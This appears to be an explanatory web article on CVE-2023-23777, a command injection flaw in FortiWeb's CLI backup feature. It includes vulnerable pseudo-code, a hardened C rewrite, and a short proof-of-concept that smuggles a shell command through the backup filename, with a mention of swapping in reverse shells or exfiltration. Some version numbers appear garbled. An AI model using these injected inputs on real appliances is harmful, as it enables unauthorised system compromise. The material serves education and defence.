CVE-2023-23777 is a dangerous OS command injection bug (CWE-78) affecting several versions of Fortinet’s FortiWeb firewall. The flaw lets attackers with privileged access run any bash command via crafted input to the system’s CLI backup feature. Here you’ll find a detailed, easy-to-understand breakdown of how this works, code snippets, exploit examples, plus official references.

What Is CVE-2023-23777?

This vulnerability lives in FortiWeb appliances (versions 7..1 and below, all v6.4 releases, and 6.3.18 and under). When a backup is started from the CLI, the input fields are not properly sanitized. If a privileged user sends bash syntax in those parameters, the system ends up running that code directly on the underlying OS.

- Fortinet CVE-2023-23777 PSIRT Advisory
- NIST NVD Entry for CVE-2023-23777

How the Vulnerability Works

The FortiWeb CLI lets privileged users create configuration backups. It takes user input for file names or destination fields. But, in vulnerable versions, these parameters are put into a system shell command _without_ proper filtering or escaping.

Example of vulnerable code (pseudo-code)

```c
#include <stdio.h>
#include <stdlib.h>

// Simplified for demonstration: the destination string is pasted straight
// into a shell command line, so shell metacharacters in it are honoured.
void backup_config(char* backup_destination){
  char cmd[256];
  snprintf(cmd, sizeof(cmd), "cp /config/configfile %s", backup_destination);
  system(cmd); // Oops! No input checking: /bin/sh parses the whole string
}
```

If the user supplies something harmless, it's fine:

```c
backup_config("/tmp/mybackup.conf")
```

Resulting command:

```sh
cp /config/configfile /tmp/mybackup.conf
```

But with malicious input:

```c
backup_config("/tmp/mybackup.conf ; id > /tmp/pwned ; #")
```

Resulting command:

```sh
cp /config/configfile /tmp/mybackup.conf ; id > /tmp/pwned ; #
```

Now, after the copy, the `id` command runs and writes its output to /tmp/pwned! The `;` ends the `cp` command, and the `#` comments out whatever the program appended after the user-controlled string.
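For contrast, here is an added example of how the same backup routine looks when written defensively. It is not FortiWeb code or Fortinet's fix; it assumes the same `cp /config/configfile <dest>` operation as the pseudo-code above and applies two independent defences: a strict allowlist check on the destination, and starting `cp` through `execv()` so no shell ever parses the string.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Added example (not FortiWeb code): hardened counterpart of backup_config().
 * Return 1 if 'path' is an absolute path made only of [A-Za-z0-9._/-],
 * contains no "..", and is of bounded length; otherwise 0. */
int is_safe_backup_path(const char *path) {
    size_t n = strlen(path);
    if (n == 0 || n >= 200 || path[0] != '/') return 0;
    if (strstr(path, "..") != NULL) return 0;       /* no traversal */
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)path[i];
        if (!(isalnum(c) || c == '.' || c == '_' || c == '/' || c == '-'))
            return 0;                                /* rejects ' ', ';', '#', ... */
    }
    return 1;
}

/* Copy the config file to 'backup_destination' without invoking a shell.
 * Returns 0 on success, -1 if the input is rejected or cp fails. */
int backup_config_safe(const char *backup_destination) {
    if (!is_safe_backup_path(backup_destination)) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        /* argv elements are passed as separate strings: the destination is
         * one argument to cp and is never re-parsed as a command line. */
        char *const argv[] = {"cp", "/config/configfile",
                              (char *)backup_destination, NULL};
        execv("/bin/cp", argv);
        _exit(127);                                  /* exec failed */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return (WIFEXITED(status) && WEXITSTATUS(status) == 0) ? 0 : -1;
}

int main(void) {
    const char *bad = "/tmp/mybackup.conf ; id > /tmp/pwned ; #";  /* page's payload */
    printf("harmless accepted:  %d\n", is_safe_backup_path("/tmp/mybackup.conf"));
    printf("malicious accepted: %d\n", is_safe_backup_path(bad));
    printf("backup with malicious input: %d\n", backup_config_safe(bad));
    return 0;
}
```

Even if the allowlist were bypassed, the `execv()` path would hand the whole string to `cp` as a single filename argument, so the injected `id` would never run.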

Proof-of-Concept Exploit

> Warning: This is for educational purposes only. Do not use it on systems you do not own or have permission to test!

Let’s say you already have an authenticated, privileged CLI session (SSH or local console).

```sh
exec backup config filename="/tmp/backup.cfg; id > /tmp/pwnd_by_me; #"
```

Resulting command on the underlying OS:

```sh
cp /config/configfile /tmp/backup.cfg; id > /tmp/pwnd_by_me; #
```

Then check the output file:

```sh
cat /tmp/pwnd_by_me
```

It should show user info, proving code execution.

You can substitute any shell command in place of id — such as starting a reverse shell, exfiltrating files, or adding new users.

Mitigation

- Upgrade FortiWeb: Fortinet patched this in versions above 7..1, 6.3.19, and in new 6.4 releases.
  Download official firmware updates here.

References & Extra Reading

- Fortinet PSIRT - Official Notice
- MITRE CWE-78 - OS Command Injection
- NIST NVD CVE Entry

Conclusion

CVE-2023-23777 is a classic case of “OS command injection” — made possible by not sanitizing user data sent to a shell command. Anyone with privileged CLI access to vulnerable FortiWeb systems can fully compromise them. If you run FortiWeb, check your version and update to stay safe!

*If you enjoyed this breakdown or have more questions, feel free to reach out or share this resource with your team.*

Timeline

Published on: 07/11/2023 09:15:09 UTC
Last modified on: 11/07/2023 04:07:56 UTC